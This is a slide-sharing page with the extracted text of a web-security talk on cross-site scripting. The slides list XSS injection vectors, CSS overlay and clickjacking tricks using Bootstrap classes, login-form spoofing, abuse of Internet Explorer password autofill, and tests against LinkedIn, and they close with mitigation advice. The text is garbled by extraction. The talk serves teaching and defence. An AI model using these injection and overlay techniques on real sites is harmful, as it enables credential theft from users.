how we hacked
play

How we hacked and how you can be safe and what happened next Ruben - PowerPoint PPT Presentation

Apr 01, 2024 •271 likes •569 views

How we hacked How we hacked and how you can be safe and what happened next Ruben van Vreeland Ruben van Vreeland Web Application Security Web hosting / infrastructure Web applications / platforms VB6, C#, PHP, (Spring) Java

  1. How we hacked How we hacked and how you can be safe and what happened next Ruben van Vreeland

  2. Ruben van Vreeland • Web Application Security • Web hosting / infrastructure • Web applications / platforms • VB6, C#, PHP, (Spring) Java • The art of exploitation of the Web • Co-Founder BitSensor: security & insight

  3. Fixed

  4. Fixed

  5. Black magic?

  6. The ¡art ¡of ¡exploita.on • Dissect ¡in ¡5 ¡steps ¡ • Intro ¡XSS ¡ ¡ • Visual ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡HTML ¡+ ¡styling ¡ ¡ • Whitelist ¡bypass ¡ ¡ • Internet ¡Explorer ¡password ¡autocomplete ¡ ¡ • ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡combining ¡both ¡ ¡

  7. Easy ¡intro ¡XSS

  8. Browser ¡Exploita.on ¡Framework User ¡Data ¡ Change ¡Data ¡ XSS ¡ Bootstrap ¡ Payload ¡ Passwords ¡ WEBPAGE ¡ WEBPAGE ¡ BeEF ¡ Comand ¡& ¡Control ¡ BROWSER ¡ Firewalled ¡

  9. Common ¡XSS ¡vectors Unsani.z Unsani.zed ed ¡HTML HTML <script>payload</script> Unesc Unescaped aped ¡ ¡aGribut aGribute <img ¡src=“ ” ¡/><script>payload</script><a ¡“ ” ¡/> <img ¡src=“/favicon.png” ¡onload=“payload” ¡/> Unsani.z Unsani.zed ed ¡ ¡aGribut aGribute ¡c ¡con onten ent <a ¡href=“javascript:payload” ¡/> Unsani.z Unsani.zed ed/Wr Wrongly ¡ ¡en encod oded ed ¡scrip ¡script Var ¡a ¡= ¡b; ¡ ¡Payload; Unsani.z Unsani.zed ed ¡S ¡Style ¡( yle ¡(ol older er ¡IE ¡ ¡IE ¡on only) ) <img ¡src=“” ¡style=“width: ¡expression(payload); ¡” ¡/>

  10. <a ¡href="javascript:alert(/Exploit ¡me!/)"> javascript:alert(/Exploit ¡me!/) </a> ¡ ¡

  11. <a href=“javascript:payload” style=“ background: rgba(255, 0, 0, 0.5); position: fixed; left: 0px; top: 0px; width: 100%; height: 100%; ” > </a> hMp://output.jsbin.com/cipozanute/1/ ¡ ¡

  12. But, ¡wait <a href=“*”> <* width=“*” height=“*” class=“*” style=“” /> Unsanitized Style (older IE only) <img src=“” style=“width: expression(payload); ” />

  13. ¡<head> ¡ ¡ ¡ ¡<meta ¡charset="u[-­‑8"> ¡ ¡ ¡ ¡<meta ¡hGp-­‑equiv="X-­‑UA-­‑Compa.ble" ¡ content="IE=edge"> ¡ ¡ ¡ ¡<meta ¡name="viewport" ¡content="width=device-­‑ width, ¡ini.al-­‑scale=1"> ¡ ¡ ¡ ¡<!-­‑-­‑ ¡Bootstrap ¡core ¡CSS ¡-­‑-­‑> ¡ ¡ ¡ ¡<l <link ¡ ¡hr href=" ="hGp://getbootstrap.com/ m/dis dist/cs css/ bootstrap.mi min.css" ¡ ¡re rel=" ="stylesheet"> >

  14. Defined ¡in ¡ bootstrap.min.css 3663 ¡.dropdown-­‑backdrop ¡{ ¡ ¡ 4299 ¡.navbar-­‑fixed-­‑top, ¡ ¡ 3664 ¡ ¡ ¡posiZon: ¡fixed; ¡ ¡ 4300 ¡.navbar-­‑fixed-­‑boMom ¡{ ¡ ¡ 3665 ¡ ¡ ¡top: ¡0; ¡ ¡ 4301 ¡ ¡ ¡posiZon: ¡fixed; ¡ ¡ 3666 ¡ ¡ ¡right: ¡0; ¡ ¡ 4302 ¡ ¡ ¡right: ¡0; ¡ ¡ 3667 ¡ ¡ ¡boMom: ¡0; ¡ ¡ 4303 ¡ ¡ ¡le`: ¡0; ¡ ¡ 3668 ¡ ¡ ¡le`: ¡0; ¡ ¡ 4304 ¡ ¡ ¡z-­‑index: ¡1030; ¡ ¡ 3669 ¡ ¡ ¡z-­‑index: ¡990; ¡ ¡ 4305 ¡} ¡ ¡ 3670 ¡} ¡ ¡

  15. Exploi.ng ¡with ¡style <a ¡ ¡ ¡ ¡ ¡width=“100%” ¡ ¡ ¡ ¡height=“100%” ¡ ¡ ¡ ¡ ¡href=“javascript:payload” ¡ ¡ ¡ ¡ ¡class=“dropdown-­‑backdrop ¡navbar-­‑fixed-­‑top”> </a> ¡ ¡ ¡ ¡ hMp://output.jsbin.com/zoqipeloca/1/ ¡ ¡ ¡

  17. Hijack ¡login Using ¡class ¡aGribute Recreate ¡pixel-­‑perfect ¡clone ¡ ¡ user ¡ ¡ ¡ password ¡ ¡ ¡ hMp://jsbin.com/dejite/13/edit ¡ ¡ Login ¡ ¡

  18. Abuse ¡Password ¡Manager • Same-­‑Origin ¡IE: ¡Autofilled • Submit ¡buGon ¡overlay ¡100% ¡x ¡100% ¡ • Not ¡autofilled: ¡spoof user ¡ password ¡ Login ¡ hMp://jsbin.com/dejite/13/edit hMps://www.cs.utexas.edu/~suman/publicaZons/suman_pwdmgr.pdf ¡

  19. Fixed

  20. LinkedIn

  21. Failed: ¡javascript ¡link

  22. Failed: ¡iframe ¡cross ¡domain

  23. Worked ¡100% ¡covering ¡iframe ¡

  24. Failed: ¡iframe ¡open ¡redirect

  25. Worked: ¡Covering ¡link

  26. Worked: ¡Covering ¡image ¡+ ¡Link

  28. To ¡conclude Sani.z Sani.ze AGribute: ¡id, ¡class, ¡style oembed/embed.ly Har Harden en HTML5 ¡IFrame ¡Sandbox

  29. info@bitsensor.io ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland

How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland

How we hacked How we hacked and what happened next and how you can be safe Ruben van Vreeland Fixed Fixed https://www.owasp.org/index.php/Top_10_2013-Top_10 &lt;script&gt;alert(1)&lt;/script&gt; User Data Change Data XSS Bootstrap

1.06k views • 59 slides
Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you

Welcome to NEOnets Cyber Security Executive Briefing If you havent yet been hacked, you will be. In fact, you already may have been hacked, but dont know it yet. Stu Davis, Chief Information Officer, Ohio Department of

600 views • 45 slides
Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical

Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical

Your web server has been hacked now what? Archzilon Eshun-Davies (@laudarch)_ CISO/CEO Tactical Intelligence Security OWASP Ghana 2019 Who is this talk for? - Individuals, developers and sys admins. Are you sure youve been hacked? Q1:

247 views • 11 slides
Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot

Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot

Hardening WordPress (or, How Not To Get Hacked And What To Do When You Are) Gregory Ray dot gray inc. @dotgray Sunday, March 15, 15 Resources Codex.WordPress.org / Hardening_WordPress Blog.Sucuri.net / WordPress Security WPSecure.net /

608 views • 32 slides
Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1

Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1

A Strategic Portfolio Focus on Identity Risk &amp; Governance I may not get hacked but I know I will be audited! 1 #GetIAMRight | One Identity - Restricted - Confidential IAM Risk Framework Provide a comprehensive view of real-time

366 views • 13 slides
The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well

The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well

The Shocking Secrets of the Electric Grid !!! Are Current Fears That It Can Be Hacked Well Grounded? Eastern Western Texas Transmission G L Generation Load Kilowatt = 1 thousand watts Megawatt = 1 million watts Gigawatt = 1

323 views • 18 slides
HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor,

HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor,

HACKED EVIDENCE - NOW WHAT? Kyiv Arbitration Days, 13 September 2019 Veronika Korom Solicitor, England &amp; Wales Avocat au Barreau de Paris ESSEC Business School This copy is for your personal, non-commercial use only. To order

457 views • 8 slides
How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at

How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at

How I Hacked facebook Again! by Orange Tsai Orange Tsai Principal security researcher at DEVCORE Captain of HITCON CTF team 0day researcher, focusing on Web/Application security orange_8361 Infiltrating Corporate Intranet Like NSA

764 views • 75 slides
How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November

How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November

How we hacked Online Banking Malware Sebastian Bachmann &amp; Tibor Eli as 22. November 2014 B-Sides Vienna Sebastian Bachmann &amp; Tibor Eli as How we hacked Online Banking Malware 22. November 2014 1 / 55 About Us About:

576 views • 55 slides
#Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS

#Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS

2/28/2019 #Hacked How safe is your city? Mike Sturm, IT Director, City of San Marcos Beth Ann Unger, IS Manager, City of Frisco How frequently are local governments under cyberattack? 70 60 50 40 30 20 10 0 Hourly or more At least

437 views • 18 slides
View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert,

View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert,

View The Email to Get Hacked: Attacking SMS-based Two-Factor Authentication Philipp Markert, Florian Farke, and Markus Drmuth Santa Clara, California, USA | WAY 2019 | August 11, 2019 Two-Factor Authentication 1 1 2 1 Gmail 2FA

415 views • 28 slides
Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon

Secure Audit Logging Systems Secure Audit Logging Systems Richard Kramer, Member IEEE Oregon State University 1 How does someone know they have been HACKED!? and WHO did it!? HACKED!? and WHO did it!? 2 Audit Logs in the News!

701 views • 51 slides
Aim Inspired by this I wanted to look into the following: Is it possible to collect

Aim Inspired by this I wanted to look into the following: Is it possible to collect

Twitter sentiment vs. Stock price Background On April 24 th 2013, the Twitter account belonging to Associated Press was hacked. Fake posts about the Whitehouse being bombed and the President being injured were posted. This lead to a

467 views • 23 slides
Page 1 1 Review: Exploiting Coherence Review: Precise Collisions hacked clean up player

Page 1 1 Review: Exploiting Coherence Review: Precise Collisions hacked clean up player

University of British Columbia Review: Picking Methods CPSC 314 Computer Graphics manual ray intersection May-June 2005 y Tamara Munzner VCS x Textures, Procedural Approaches, bounding extents Sampling Week 4, Thu Jun 2

381 views • 19 slides
accounts hacked among several in recent weeks to come upon security breaches in their AP

accounts hacked among several in recent weeks to come upon security breaches in their AP

HEADLINES Impact and Cost According to the Ponemon At least 19 states have Institutes most recent introduced or are considering &quot;Annual Study: U.S. Cost of security breach legislation in a Data Breach&quot; (March 2014. Most of the

401 views • 12 slides
The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber

The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber

The Onslaught of Cyber Security Threats and What that Means to You No End in Sight for Cyber Crime Growth Number of mobile 200M devices affected IBM 11.6M Number of accounts hacked CNN Money 432M Number of malware samples collected Intel

652 views • 30 slides
Network Decoding C&amp;C Channels - gcat Brought to you by... + = Red Team/Blue Team

Network Decoding C&amp;C Channels - gcat Brought to you by... + = Red Team/Blue Team

Network Decoding C&amp;C Channels - gcat Brought to you by... + = Red Team/Blue Team Awesomeness This will be a series! Positive response to decoding dnscat2 We've decided to make this a series Will dissect a C&amp;C every few

642 views • 24 slides
Learning Hierarchical Bayesian Networks for Genome-Wide Association Studies Raphal Mourad 1 ,

Learning Hierarchical Bayesian Networks for Genome-Wide Association Studies Raphal Mourad 1 ,

Learning Hierarchical Bayesian Networks for Genome-Wide Association Studies Raphal Mourad 1 , Christine Sinoquet 2 and Philippe Leray 1 KOD team (KnOwledge and Decision), 1 LINA, UMR CNRS 6241, Ecole Polytechnique de l'Universit de Nantes. 2

381 views • 27 slides
Slides from FYS4411 Lectures Morten Hjorth-Jensen &amp; Gustav R. Jansen 1 Department of Physics

Slides from FYS4411 Lectures Morten Hjorth-Jensen &amp; Gustav R. Jansen 1 Department of Physics

Slides from FYS4411 Lectures Morten Hjorth-Jensen &amp; Gustav R. Jansen 1 Department of Physics and Center of Mathematics for Applications University of Oslo, N-0316 Oslo, Norway Spring 2012 1 / 87 Topics for Week 8, February 20. - 24.

1.35k views • 87 slides
Software Engineering Seminar Malte Schwerhoff Petar Tsankov

Software Engineering Seminar Malte Schwerhoff Petar Tsankov

Software Engineering Seminar Malte Schwerhoff Petar Tsankov http://lec.inf.ethz.ch/seminars/2019/ses/ Slides based on previous seminars by Markus Pschel, Martin Vechev Learning Objects How to present technical work How to read,

260 views • 13 slides
CMSC 430 Introduction to Compilers Fall 2018 Symbolic Execution Introduction Static

CMSC 430 Introduction to Compilers Fall 2018 Symbolic Execution Introduction Static

CMSC 430 Introduction to Compilers Fall 2018 Symbolic Execution Introduction Static analysis is great Lots of interesting ideas and tools Commercial companies sell, use static analysis It all looks good on paper, and in papers

317 views • 27 slides
Renovating Smaller Central Business Districts: The Impact of Main Street Revitalization on Rural

Renovating Smaller Central Business Districts: The Impact of Main Street Revitalization on Rural

Renovating Smaller Central Business Districts: The Impact of Main Street Revitalization on Rural Job Growth Andrew J. Van Leuven The Ohio State University John Glenn College of Public Affairs October 25, 2019 Andrew J. Van Leuven EDQ

266 views • 25 slides
VIRTUAL CONFERENCE ictcm.com | #ICTCM 32 nd International Conference on Technology in Collegiate

VIRTUAL CONFERENCE ictcm.com | #ICTCM 32 nd International Conference on Technology in Collegiate

32 nd International Conference on Technology in Collegiate Mathematics VIRTUAL CONFERENCE ictcm.com | #ICTCM 32 nd International Conference on Technology in Collegiate Mathematics VIRTUAL CONFERENCE #ICTCM Exploring Volumes with GeoGebra

485 views • 20 slides
Lean Process Improvement in Healthcare: Barriers and Opportunities Edward G. Anderson Jr., Ph.D.

Lean Process Improvement in Healthcare: Barriers and Opportunities Edward G. Anderson Jr., Ph.D.

Lean Process Improvement in Healthcare: Barriers and Opportunities Edward G. Anderson Jr., Ph.D. Neal Wendt, M.S., M.A. Anderson &amp; Wendt Introductions Edward G. Anderson Jr., Neal Wendt, M.S, M.A.: Ph.D. : Fellow of the Lean

711 views • 22 slides

More recommend